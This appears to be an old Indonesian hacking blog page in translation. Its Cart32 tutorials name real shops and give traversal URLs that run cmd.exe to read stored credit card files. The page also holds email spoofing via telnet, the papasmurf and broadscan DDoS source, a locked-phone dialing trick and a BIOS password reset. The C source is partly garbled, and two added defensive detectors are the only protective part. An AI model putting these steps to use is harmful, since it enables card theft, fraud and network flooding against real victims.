Open Source

Open source software will not be swallowed by time, because many people support these programs and such software competes well with paid software.

Certified

Taking a certification is not simply about becoming famous or arrogant; it is about finding out whether you can carry the moral responsibility for what you have learned, and how to pass that knowledge on to others without expecting anything in return.

Operating System Pentest

Operating systems such as BackTrack, Kali Linux, etc. really do pamper pentesters in carrying out their work according to the applicable procedures. These OSes provide a number of interesting tools, for example for information gathering, vulnerability assessment, exploitation, etc.

Sherlock Holmes

This detective film is surely liked by some IT colleagues, because the way the story unfolds when a case is being solved is not monotonous and requires out-of-the-ordinary logical thinking. You need a strong imagination to watch this film.

Forensic

IT forensic work demands a high level of understanding of the case being handled. The forensics team must be able to read how the attacker thinks when carrying out an attack. The attacker is usually one step ahead of the team hunting them.

Saturday, 15 November 2008

PHP Tutorials, Gambas, Virus Collection

Computer Graphics assignment for Mr. Toyib and Mr. Adang

Credit Card Theft on Cart32 Web Sites

Jasakom - Theft of credit card numbers on the internet has become daily fare for the hacker community, both in Indonesia and worldwide.
One of the most widely used methods is through weaknesses in web sites that offer online payment by credit card.
One program often used by web sites offering this online payment service is Cart32, which is also the one most often broken into by hackers to obtain credit cards.

TUTORIAL I : Cart32 v3.5a

NB: Can only be used against some sites that have the same weakness.

Step 1: First find a Cart32 v3.5a web site
Step 2: Go to the site's Cart32.exe
http://target/login/unicode/cart32.exe
(example: http://www.connectionsmall.com/scripts/cart32.exe/)
Step 3: Once you are in, you will be shown a display like the one below:

========================================
Cart32 v3.5a Shopping Cart System for Windows
http://www.cart32.com/
Registered to Greymane Connections
License: Unlimited clients
©1996-2001 McMurtrey/Whitaker & Associates, Inc.
Build 714
========================================

Step 4: Now what you have to do is add one of the following extensions to the
end of the URL; 98% use #1 & #2

a. (..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)
b. (..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\)
c. (..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\) ONLY USED SOMETIMES!

(example: http://www.connectionsmall.com/scripts /.%e0%80%af.. /..%e0%80%af.. /..%e0%80%af.. /winnt/system32/cmd.exe?/c+dir+c:\)

Step 5: Once you are in the root directory (c:\), to get to the cc's, append (\progra~1\MWAInc\Cart32\) to the end of that URL, so that you now see something like: http://www.connectionsmall.com /scripts /.%e0%80%af.. /..%e0%80%af.. /..%e0%80%af../ winnt/system32/cmd.exe?/c+ dir+c:\progra~1\ mwainc\cart32\
Now you can see many files such as:

2814659000-001001.c32
2814659000-001002.c32
2814659000-001003.c32

Step 6: Copy one of those file names and add it to the end of the URL, so that it looks like:

http://www.connectionsmall.com/ scripts /.%e0%80%af../..%e0%80%af.. /..%e0%80%af../ winnt/system32 /cmd.exe?/c+type+ c:\progra~1\ mwainc\cart32\ 2814659000-001003.c32

Note: There you will see other files containing a great many cc's, such as:

RONACK-orders.txt (this file is not on this particular site)
procure-orders.txt (this file is not on this particular site)

Step 7: Before you access the other file types, you must first change
*c+dir+c:\* to *c+type+c:\*


TUTORIAL II : Cart32 v3.5a

Target: http://www.partybows.com
1. Go to http://www.partybows.com
2. Click http://www.partybows.com/seasonal.htm
3. Enter Quantity= 1
Basically, pretend you are buying and click order
4. You will then end up here:
https://secure.axionet.com/partybows/cgi-bin/cart32.exe/partybows-AddItem
5. Change it to
https://secure.axionet.com/partybows/cgi-bin/cart32.exe/error
Cart32 v3.5 Error
CART32 Build 619
The following internal error has occurred: Invalid procedure Error Number = 5
Click Here For Possible Solutions
etc.
6. Find its order log
Cart32 Setup Info and Directory
Mail Server = mail.axion.net
Section=Main
AdminDir = D:\secure\webroot\partybows\cgi-bin\cart32\
So: partybows-orders.txt
7. So finally: http://www.partybows.com/cgi-bin/cart32/partybows-orders.txt



TUTORIAL III : Cart32 v3.5a

search +/scripts/cart32.exe/
Exploitable Directories
-/scripts/cart32.exe/
-/scripts/cart32.exe/cart32clientlist
-/script/c32web.exe/ChangeAdminPassword
-/scripts/c32web.exe/
-/cgi-shl/c32web.exe/

Wherever there is the cart32.exe, add this to the end of it: /cart32clientlist, and erase the rest. A menu will come up with a submit box; click go. It will list ALL clients and their passwords. Passwords will be encrypted. After decrypting the password, go to wherever the c32web.exe file is. That's the instructions with exploits what that channel we were just in called!


Bye.. .




:: JoeGoeL ::.



Tutorial Hacking Cart32 v3.5a - Exploit
Author JoeGoeL aka Pred4t0r
Published JasaKom (English Version)
Dedicated Hiddenline & Medanhacking Crew :
#hiddenline - #medanhacking - on DALNET
Contact JoeGoeL@linuxmail.org
WebSite http://private.localbox.net (staff only - no link) :
http://published.localbox.net (free exploits - k00lz :
http://restriction.localbox.net (staff only - no link) :
Greetz r3v0lt,phayzer, the-p0, hellGoD, zeal0th,c4rnifor,etc! :
Creditz GDS, Hantu_BJM, ChriztianZ, BlackApriL, Phardera, Kebam, etc

Warning:
All information in this article is to be used only as reference material for educational purposes. Information is not a crime. Knowing how to do something is *NOT* a crime. Use this information to protect yourself. This tutorial was written based on my experience exploring cyberspace. It was collected from various tutorials and from chatting in #. And this text is intended for newbies. For those who are already genuine CARDERs: if this tutorial has a lot of mistakes, I ask for your criticism, OK!
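A defender's view of Tutorials I to III, as an added example that is not part of the original article: a log check that decodes each request target, reports overlong UTF-8 encodings of "/" and "\" (the %c0%af, %e0%80%af and %c1%9c forms above) and flags the Cart32 paths the tutorials name. The log lines, IP addresses and the shop name "shop" are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Path markers taken from the tutorials above; matching is case-insensitive.
MARKERS = {
    "cmd.exe": "command interpreter requested over HTTP",
    "cart32clientlist": "Cart32 client and password listing",
    "changeadminpassword": "c32web.exe admin password change",
    "cart32.exe/error": "forced Cart32 error page",
    "-orders.txt": "Cart32 order log fetched from the web root",
    ".c32": "Cart32 order data file",
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def overlong_sequences(raw: bytes):
    """Return (offset, char) for each overlong 2- or 3-byte UTF-8 sequence."""
    found, i = [], 0
    while i < len(raw):
        two, three = raw[i:i + 2], raw[i:i + 3]
        if len(two) == 2 and two[0] in (0xC0, 0xC1) and two[1] & 0xC0 == 0x80:
            # C0/C1 lead bytes can only encode code points below 0x80.
            found.append((i, chr(((two[0] & 0x1F) << 6) | (two[1] & 0x3F))))
            i += 2
        elif (len(three) == 3 and three[0] == 0xE0
              and 0x80 <= three[1] <= 0x9F and three[2] & 0xC0 == 0x80):
            # E0 followed by 80..9F encodes a code point below 0x800.
            found.append((i, chr(((three[1] & 0x3F) << 6) | (three[2] & 0x3F))))
            i += 3
        else:
            i += 1
    return found


def inspect(line: str):
    """Return the de-duplicated reasons a log line looks suspicious."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    raw = unquote_to_bytes(match.group(1))
    reasons = [f"overlong UTF-8 encoding of {ch!r}"
               for _, ch in overlong_sequences(raw)]
    lowered = raw.decode("latin-1").lower()
    reasons += [why for marker, why in MARKERS.items() if marker in lowered]
    return list(dict.fromkeys(reasons))


# Constructed access-log lines (documentation IP ranges, made-up shop name).
SAMPLE_LOG = [
    r'192.0.2.10 - - [15/Nov/2008:10:00:00 +0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 200 512',
    r'192.0.2.10 - - [15/Nov/2008:10:00:09 +0700] "GET /scripts/cart32.exe/cart32clientlist HTTP/1.0" 200 2048',
    r'192.0.2.11 - - [15/Nov/2008:10:02:00 +0700] "GET /cgi-bin/cart32/shop-orders.txt HTTP/1.0" 200 9000',
    r'198.51.100.7 - - [15/Nov/2008:10:03:00 +0700] "GET /scripts/cart32.exe/shop-AddItem HTTP/1.0" 200 700',
    r'198.51.100.7 - - [15/Nov/2008:10:03:05 +0700] "GET /caf%c3%a9/menu.html HTTP/1.0" 200 300',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect(entry) or "clean", "<-", entry.split('"')[1])
```

The last two sample lines are an ordinary add-to-cart request and a correctly encoded "é", and neither is flagged.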

Sending Fake Email

This is the easiest way to send a fake email to someone else without
having access to the machine in question.

To send a fake e-mail:
1. Find the domain you want to use. Say the server name is: www.sasaran.com
2. Open a telnet session to the SMTP port on that domain.
First, just port scan to find out whether the target server has SMTP.
But it is better to just guess first whether the server has an SMTP port or not,
in case the server has portsentry installed.
If you have guessed and it did not work, then just port scan it.
You can use the nmap tool.

#nmap www.sasaran.com

If the SMTP port is open, just telnet to that server.

#telnet www.sasaran.com 25

Once you are in, follow the instructions below



3. MAIL FROM:coolstuff@sasaran.com
(or net or id or whatever, matching the target server's name)
4. RCPT TO:admin@someplace.com
5. DATA
6. Type the body of the email here. When you want to finish, type a period (.) on a new line
7. QUIT

Hacking a Locked Telephone

Lately the telephone set has become one of our necessities for communicating, especially when we suddenly need to contact our relatives.

If at some point we want to use a telephone, but the telephone is locked and the key has been hidden, don't worry, because we can still use the telephone.

I want to share a little knowledge: how we can use a telephone even though it is locked.

1. First check the back of your telephone. If the lock is open, just use it. If it is locked, follow the next steps.
2. Lift the handset.
3. Then look at the button that is normally used to hang up the call.
4. Press that button repeatedly and quickly.

number guide:
"1" (1 time), "2" (2 times), "3" (three times) and so on up to "9" (nine times);
for the digit "0" (ten times).

Example: "7359463" (seven times, three times, five times, nine times, four times, six times, three times)

GOOD LUCK........!!!!!!!
The side effect: this only activates the telephone, while the call charges still run for as long as you talk.

Virus Smurf.c

/*
* (papa)smurf.c v5.0 by TFreak - http://www.rootshell.com
*
* A year ago today I made what remains the questionable decision of
* releasing my program 'smurf', a program which uses broadcast "amplifiers"
* to turn an icmp flood into an icmp holocaust, into the hands of packet
* monkeys, script kiddies and all round clueless idiots alike. Nine months
* following, a second program 'fraggle', smurfs udp cousin, was introducted
* into their Denial of Service orgy. This brings us to today, July 28,
* 1998, one year after my first "mistake". The result, proof that history
* does repeat itself and a hybrid of the original programs.
*
* First may I say that I in no way take credit for "discovering" this.
* There is no doubt in my mind that this idea was invisioned long before
* I was even sperm -- I merely decided to do something about it. Secondly,
* if you want to hold me personally responsible for turning the internet
* into a larger sesspool of crap than it already is, then may I take this
* opportunity to deliver to you a message of the utmost importance -- "Fuck
* you". If I didn't write it, someone else would have.
*
* I must admit that there really is no security value for me releasing this
* new version. In fact, my goals for the version are quite silly. First,
* I didn't like the way my old code looked, it was ugly to look at and it
* did some stupid unoptimized things. Second, it's smurfs one year
* birthday -- Since I highly doubt anyone would have bought it a cake, I
* thought I would do something "special" to commemorate the day.
*
* Hmm, I am starting to see why I am known for my headers (wage eats
* playdough!).
*
* Well, I guess this wouldn't be the same if I did not include some sort
* of shoutouts, so here goes...
*
* A hearty handshake to...
*
* o MSofty, pbug, Kain -- No matter which path each of you decides to
* take in the future, I will always look back upon these days as one
* of the most enjoyable, memorable and thought-provoking experiences
* of my life. I have nothing but the highest degree of respect for
* each of you, and I value your friendship immensely. Here's to
* living, learning and laughing -- Cheers gentlemen. --Dan
* o Hi JoJo!
* o morbid and his grandam barbiegirl gino styles, yo.
* o The old #havok crew.
* o Pharos,silph,chris@unix.org,Viola,Vonne,Dianora,fyber,silitek,
* brightmn,Craig Huegen,Dakal,Col_Rebel,Rick the Temp,jenni`,Paige,
* RedFemme,nici,everlast,and everyone else I know and love.
*
* A hearty enema using 15.0mol/L HCl to...
*
* o #Conflict. Perhaps you are just my scapegoat of agression, but you
* all really need to stop flooding efnet servers/taking over irc
* channels/mass owning networks running old qpoppers and get a
* fucking life.
* o BR. It wouldn't be the same without you in here, but to be honest
* you really aren't worth the space in the already way-to-bloated
* header, nor the creative energy of me coming up with an intricate
* bash that you will never understand anyway. Shrug, hatred disguises
* itself as apathy with time.
*
* I feel like I'm writing a fucking essay here...
*
* To compile: "gcc -DLINUX -o smurf5 papasmurf.c" if your LINUXish.
* or just
* "gcc -o smurf5 papasmurf.c" if your BSDish.
*
* Old linux kernels won't have BSD header support, so this may not compile.
* If you wish a linux-only version, do it yourself, or mail
* tfreak@jaded.net, and I might lend you mine.
*
* And most importantly, please don't abuse this. If you are going to do
* anything with this code, learn from it.
*
* I remain,
*
* TFreak.
*
*/

/* End of Hideously Long Header */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef LINUX
#define __FAVOR_BSD /* should be __FAVOUR_BSD ;) */
#ifndef _USE_BSD
#define _USE_BSD
#endif
#endif
#include
#include
#include

#ifdef LINUX
#define FIX(n) htons(n)
#else
#define FIX(n) (n)
#endif

struct smurf_t
{
struct sockaddr_in sin; /* socket prot structure */
int s; /* socket */
int udp, icmp; /* icmp, udp booleans */
int rnd; /* Random dst port boolean */
int psize; /* packet size */
int num; /* number of packets to send */
int delay; /* delay between (in ms) */
u_short dstport[25+1]; /* dest port array (udp) */
u_short srcport; /* source port (udp) */
char *padding; /* junk data */
};

/* function prototypes */
void usage (char *);
u_long resolve (char *);
void getports (struct smurf_t *, char *);
void smurficmp (struct smurf_t *, u_long);
void smurfudp (struct smurf_t *, u_long, int);
u_short in_chksum (u_short *, int);


int
main (int argc, char *argv[])
{
struct smurf_t sm;
struct stat st;
u_long bcast[1024];
char buf[32];
int c, fd, n, cycle, num = 0, on = 1;
FILE *bcastfile;

/* shameless self promotion banner */
fprintf(stderr, "\n(papa)smurf.c v5.0 by TFreak\n\n");

if (argc < icmp =" 1;" psize =" 64;" num =" 0;" delay =" 10000;" sin_port =" htons(0);" sin_family =" AF_INET;" srcport =" 0;" s_addr =" resolve(argv[1]);" bcastfile =" fopen(argv[2]," optind =" 3;" c =" getopt(argc," rnd =" 1;" rnd =" 1;" srcport =" 0;" num =" atoi(optarg);" delay =" atoi(optarg);" icmp =" 1;" icmp =" 0;" udp =" 1;" icmp =" 1;" udp =" 1;" srcport =" (u_short)" psize =" atoi(optarg);" fd =" open(optarg," padding =" (char" psize =" st.st_size;" padding =" (char" s =" socket(AF_INET," p =" buf," valid =" 1;" valid =" 0;" num ="=" n =" 0," cycle =" 0;" x =" 0;" 50 ="=" cycle =" (cycle" host=""> [options]\n"
"\n"
"Options\n"
"-p: Comma separated list of dest ports (default 7)\n"
"-r: Use random dest ports\n"
"-R: Use random src/dest ports\n"
"-s: Source port (0 for random (default))\n"
"-P: Protocols to use. Either icmp, udp or both\n"
"-S: Packet size in bytes (default 64)\n"
"-f: Filename containg packet data (not needed)\n"
"-n: Num of packets to send (0 is continuous (default))\n"
"-d: Delay inbetween packets (in ms) (default 10000)\n"
"\n", s);
exit(-1);
}


u_long
resolve (char *host)
{
struct in_addr in;
struct hostent *he;

/* try ip first */
if ((in.s_addr = inet_addr(host)) == -1)
{
/* nope, try it as a fqdn */
if ((he = gethostbyname(host)) == NULL)
{
/* can't resolve, bye. */
herror("Resolving victim host");
exit(-1);
}

memcpy( (caddr_t) &in, he->h_addr, he->h_length);
}

return(in.s_addr);
}


void
getports (struct smurf_t *sm, char *p)
{
char tmpbuf[16];
int n, i;

for (n = 0, i = 0; (n < p ="=">dstport[n] = (u_short) atoi(tmpbuf);
n++; i = -1;
continue;
}

tmpbuf[i] = *p;
}
tmpbuf[i] = '\0';
sm->dstport[n] = (u_short) atoi(tmpbuf);
sm->dstport[n + 1] = 0;
}


void
smurficmp (struct smurf_t *sm, u_long dst)
{
struct ip *ip;
struct icmp *icmp;
char *packet;

int pktsize = sizeof(struct ip) + sizeof(struct icmp) + sm->psize;

packet = malloc(pktsize);
ip = (struct ip *) packet;
icmp = (struct icmp *) (packet + sizeof(struct ip));

memset(packet, 0, pktsize);

/* fill in IP header */
ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
ip->ip_len = FIX(pktsize);
ip->ip_ttl = 255;
ip->ip_off = 0;
ip->ip_id = FIX( getpid() );
ip->ip_p = IPPROTO_ICMP;
ip->ip_sum = 0;
ip->ip_src.s_addr = sm->sin.sin_addr.s_addr;
ip->ip_dst.s_addr = dst;

/* fill in ICMP header */
icmp->icmp_type = ICMP_ECHO;
icmp->icmp_code = 0;
icmp->icmp_cksum = htons(~(ICMP_ECHO <<>s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
sizeof(struct sockaddr)) == -1)
{
perror("sendto()");
exit(-1);
}

free(packet); /* free willy! */
}


void
smurfudp (struct smurf_t *sm, u_long dst, int n)
{
struct ip *ip;
struct udphdr *udp;
char *packet, *data;

int pktsize = sizeof(struct ip) + sizeof(struct udphdr) + sm->psize;

packet = (char *) malloc(pktsize);
ip = (struct ip *) packet;
udp = (struct udphdr *) (packet + sizeof(struct ip));
data = (char *) (packet + sizeof(struct ip) + sizeof(struct udphdr));

memset(packet, 0, pktsize);
if (*sm->padding)
memcpy((char *)data, sm->padding, sm->psize);

/* fill in IP header */
ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
ip->ip_len = FIX(pktsize);
ip->ip_ttl = 255;
ip->ip_off = 0;
ip->ip_id = FIX( getpid() );
ip->ip_p = IPPROTO_UDP;
ip->ip_sum = 0;
ip->ip_src.s_addr = sm->sin.sin_addr.s_addr;
ip->ip_dst.s_addr = dst;

/* fill in UDP header */
if (sm->srcport) udp->uh_sport = htons(sm->srcport);
else udp->uh_sport = htons(rand());
if (sm->rnd) udp->uh_dport = htons(rand());
else udp->uh_dport = htons(sm->dstport[n]);
udp->uh_ulen = htons(sizeof(struct udphdr) + sm->psize);
// udp->uh_sum = in_chksum((u_short *)udp, sizeof(udp));

/* send it on its way */
if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
sizeof(struct sockaddr)) == -1)
{
perror("sendto()");
exit(-1);
}

free(packet); /* free willy! */
}


u_short
in_chksum (u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;

while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}

if (nleft == 1)
{
*(u_char *)(&answer) = *(u_char *)w;
sum += answer;
}

sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}

/* EOF */


---- end -----

Below is how to find broadcast IPs using a tool that is already familiar,
namely
NMAP :)

the command: nmap -n -sP -PI -o smurf.log 'xxx.12.*.0,63,64,127,128,191,192,255'

note: only *.255 can be used for a smurf attack. The broadcast list is saved in
smurf.log, from which entries can then be picked and put into a new file as input for papasmurf.c

this file, broadscan.c, can also be used to look for broadcast servers

-- take it away ----

/* Broadscan v 0.31
DUP Broadcast IP scanner
by Vacuum http://www.technotronic.com
09-03-98
This is a very lame scanner written to
stop people from asking how to find
DUP broadcast ip addresses. Use this in
conjunction with smurf, fraggle,
or papasmurf. DoS kiddies enjoy!
*/

#include
#include

#define DEBUG 1

FILE *stream;

void pingz0r(int first, int second, int start, int end)
{
int counter,flag;
FILE *stream;
char tempstring[2048];
char parse[2048];

for (counter=start; counter /dev/null",first,
second, counter);
stream=popen(tempstring,"r");
while (fgets(parse,sizeof(parse),stream)!=NULL)
{
if (DEBUG) printf("Results:%s",parse);
if (strstr(parse,"DUP"))
{
flag=1;
fclose(stream);
break;
}
}
if (flag==1)
stream=fopen("broadcast.txt", "a");
fprintf(stream, "%d.%d.%d.255\n",first,second,counter);
fclose( stream);
}
}

main(int argc, char *argv[])

{
int first,second;

if (argc!=3)
{
printf("\nusage : %s \n\n",argv[0]);
exit(0);
}

first=atoi(argv[1]);
second=atoi(argv[2]);

if (first==127)
{
printf("%d is a localhost. You have no clue or are trying to break this program",first);
exit(0);
}
if (first>254 || first <0)>",first);
exit(0);
}
if (second>254 || second<0)>",second);
exit(0);
}

printf("Scanning for DUP broadcast ip addresses\n");
printf("Results output to broadcast.txt\n");

if (fork()!=0)
pingz0r(first,second,0,128);
else
pingz0r(first,second,128,255);

}
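Seen from the victim's side, the traffic described in the smurf header is ICMP echo replies from many hosts that answer no echo request the victim ever sent. The following is an added example, not code from the original page or from either tool's author, that finds such destinations in a list of observed ICMP packets; the packet tuples, addresses and threshold are constructed for illustration.

```python
from collections import defaultdict

ECHO_REPLY, ECHO_REQUEST = 0, 8  # ICMP type numbers


def unsolicited_echo_replies(packets, min_sources=3):
    """Map each destination to the hosts sending it unsolicited echo replies.

    packets: iterable of (src, dst, icmp_type, ident, seq) in capture order,
    as seen at the border of the network being protected. A reply counts as
    solicited when its destination earlier sent a request with the same
    identifier and sequence number. Only destinations with at least
    min_sources distinct unsolicited responders are returned.
    """
    outstanding = set()            # (requester, ident, seq) of requests seen
    responders = defaultdict(set)  # destination -> unsolicited reply sources
    for src, dst, icmp_type, ident, seq in packets:
        if icmp_type == ECHO_REQUEST:
            outstanding.add((src, ident, seq))
        elif icmp_type == ECHO_REPLY:
            if (dst, ident, seq) in outstanding:
                continue  # answer to a ping this host really sent
            responders[dst].add(src)
    return {dst: sorted(srcs) for dst, srcs in responders.items()
            if len(srcs) >= min_sources}


# Constructed capture: one normal ping exchange, then replies from four
# hosts of one subnet to 198.51.100.9, which never sent a request.
SAMPLE_PACKETS = [
    ("198.51.100.5", "192.0.2.1", ECHO_REQUEST, 77, 1),
    ("192.0.2.1", "198.51.100.5", ECHO_REPLY, 77, 1),
    ("203.0.113.1", "198.51.100.9", ECHO_REPLY, 4242, 0),
    ("203.0.113.2", "198.51.100.9", ECHO_REPLY, 4242, 0),
    ("203.0.113.3", "198.51.100.9", ECHO_REPLY, 4242, 0),
    ("203.0.113.4", "198.51.100.9", ECHO_REPLY, 4242, 0),
]

if __name__ == "__main__":
    for victim, sources in unsolicited_echo_replies(SAMPLE_PACKETS).items():
        print(victim, "receives unsolicited echo replies from", sources)
```

On the amplifier side, the corresponding control is to stop answering and forwarding directed-broadcast pings, for example `net.ipv4.icmp_echo_ignore_broadcasts=1` on Linux hosts and `no ip directed-broadcast` on Cisco IOS interfaces.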

Breaking into the BIOS

How to Break into the BIOS
I got this tip from a friend several years ago. Maybe it can help colleagues who need it. Enter DOS mode; once the DOS prompt c:\> appears, type DEBUG like this

c:\>DEBUG

Next, type

o 70 2e
o 71 ff
Q

On the screen it will look like this:

c:\>DEBUG

-o 70 2e
-o 71 ff
-Q

After typing Q you will exit debug, which means you are done. Then restart your computer, press DEL, and CONGRATULATIONS, you can now get into the BIOS.